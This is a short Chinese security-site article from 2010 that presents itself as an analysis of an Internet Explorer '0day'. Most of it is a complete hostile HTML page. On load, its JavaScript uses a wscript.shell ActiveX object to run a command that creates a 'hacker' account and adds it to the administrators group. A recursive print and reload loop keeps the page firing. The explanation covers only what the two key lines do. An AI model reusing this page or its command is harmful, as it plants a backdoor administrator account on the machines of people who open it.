频道栏目
首页 > 安全 > 网站安全 > 正文

IE 的ODAY 分析

2010-04-15 09:17:35           
收藏   我要投稿

BY hAcKjAm

首先来看代码:

<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("net user hacker hacker /add & net localgroup administrators hacker /add", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>

 

关键:

var shell=new ActiveXObject("wscript.shell");
shell.Run("net user hacker hacker /add & net localgroup administrators hacker /add", 1);

//注册wscript.shell 为 ActiveX,wscript.shell为VBS中运行程序的代码。

shell.Run("net user hacker hacker /add & net localgroup administrators hacker /add", 1);

//调用这个ActiveX,也就是wscript.shell,运行“net user hacker hacker /add & net localgroup administrators hacker /add”的DOS命令,这个命令添加了一个帐户名为hacker,密码为hacker的账户并提升为管理员组。

相关TAG标签
上一篇:解密WebShell 6.0 VIP和Manage Login等二款ASP WEBSHELL
下一篇:Joomla Component QPersonel SQL Injection Vulnerability
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站